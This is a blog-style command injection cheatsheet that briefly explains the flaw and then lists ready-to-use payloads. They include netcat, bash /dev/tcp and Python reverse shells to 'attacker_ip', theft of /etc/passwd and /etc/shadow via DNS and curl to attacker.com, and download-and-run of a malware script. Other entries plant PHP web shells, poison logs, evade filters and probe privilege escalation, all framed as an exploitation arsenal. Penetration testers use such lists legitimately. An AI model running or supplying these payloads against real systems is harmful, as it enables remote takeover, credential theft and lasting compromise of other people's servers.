Command Injection: Mastering Exploitation Techniques with a Comprehensive Cheatsheet

 

What is Command Injection?

Command Injection is a powerful attack vector where an attacker manipulates vulnerable applications to execute arbitrary system commands. When developers fail to properly handle user input, attackers gain the opportunity to exploit this oversight and directly interact with the underlying operating system. For hackers, this opens up a treasure trove of possibilities — from data exfiltration to full system compromise.

How Does Command Injection Work?

Command Injection occurs when user inputs are executed as part of system-level commands without proper validation. Here’s a typical example:

ping -c 4 $USER_INPUT

In this scenario, if $USER_INPUT isn't sanitized, an attacker can inject additional commands using separators like ;&&, or |. For instance:

$USER_INPUT="127.0.0.1; whoami"

This executes ping -c 4 127.0.0.1 followed by the whoami command, revealing the application's runtime user.

Photo by Roman Synkevych on Unsplash

Comprehensive Command Injection Cheatsheet

Here’s a collection of ready-to-use payloads for various Command Injection scenarios. Use these to exploit or test for vulnerabilities:

Basic Command Injection

; whoami
&& id
| uname -a
; cat /etc/passwd

File Manipulation

; echo "Hacked!" > /tmp/hacked.txt
&& rm -rf /tmp/hacked.txt
| touch /tmp/newfile

Reverse Shells

  • Netcat (Classic):
; nc -e /bin/bash attacker_ip 4444
  • Netcat (No -e flag):
; rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc attacker_ip 4444 > /tmp/f
  • Bash Shell:
; bash -i >& /dev/tcp/attacker_ip/4444 0>&1

Data Exfiltration

  • Exfiltrate sensitive files via DNS:
; dig $(cat /etc/passwd).attacker.com
  • Send output to an attacker-controlled server:
; curl -X POST -d "$(cat /etc/shadow)" http://attacker.com/exfil

Bypassing Filters

  • Use backticks:
`whoami`
  • Use $():
$(id)
  • Use URL encoding (e.g., encode ; as %3B):
%3Bid

Blind Injection (Time-Based)

  • Test for blind injection:
; sleep 10
  • Trigger a delayed ping:
; ping -c 10 localhost

Spawning Shells

  • Spawn an interactive shell:
; /bin/bash ; /bin/sh

Command Chaining

  • Combine commands to escalate the attack:
; wget http://attacker.com/malware.sh -O /tmp/malware.sh && bash /tmp/malware.sh
  • Execute multiple commands in sequence:
; id && pwd && ls

Network Exploits

  • Scan for open ports:
; nmap -p 1-65535 localhost
  • Trigger an outbound connection:
; curl http://attacker.com

Environment Exploration

  • Enumerate environment variables:
; env
  • Check OS version:
; uname -a

Privilege Escalation

  • Check sudo privileges:
; sudo -l
  • Exploit sudo misconfigurations:
; sudo /usr/bin/vulnerable_binary

Web Shell Uploads

  • Upload a PHP web shell:
; echo "<?php system($_GET['cmd']); ?>" > /var/www/html/shell.php
  • Upload a Python reverse shell:
; echo 'import socket,os,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker_ip",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' > /tmp/shell.py

Fuzzing for Blind Injection

  • Inject characters to provoke errors or behavior changes:
; ' " | ` $() || &&
  • Inject common payloads:
; ls && pwd | whoami

Advanced Command Injection Techniques

1. Command Obfuscation

Obfuscate payloads to bypass basic filters. Example using hexadecimal encoding for cat:

; echo -e '\x63\x61\x74 /etc/passwd'

2. Log Poisoning

Poison logs to execute commands later. Example:

; echo '<?php system($_GET["cmd"]); ?>' >> /var/log/apache2/access.log

3. Exploiting Cron Jobs

Inject malicious scripts into directories monitored by cron jobs. Example:

; echo 'bash -i >& /dev/tcp/attacker_ip/4444 0>&1' > /tmp/malicious.sh

Command Injection/Execution

#Both Unix and Windows supported
ls||id; ls ||id; ls|| id; ls || id # Execute both
ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id #  Execute 2ΒΊ if 1ΒΊ finish ok
ls&id; ls &id; ls& id; ls & id # Execute both but you can only see the output of the 2ΒΊ
ls %0A id # %0A Execute both (RECOMMENDED)

#Only unix supported
`ls` # ``
$(ls) # $()
ls; id # ; Chain commands
ls${LS_COLORS:10:1}${IFS}id # Might be useful

Command Injection is a playground for hackers, offering unlimited opportunities for exploitation, privilege escalation, and system compromise. The key to mastering this vulnerability lies in understanding the subtle variations and crafting payloads tailored to each scenario. Whether you’re targeting IoT devices, web servers, or cron jobs, this cheatsheet equips you with a robust arsenal of commands to test and exploit vulnerable systems.

Essential Collection: 20+ Hacking and Pentesting E-Books Bundle

Embark on a comprehensive learning journey with our Essential Collection: 20+ Hacking and Pentesting Books Bundle! This…

buymeacoffee.com

Comments

Post a Comment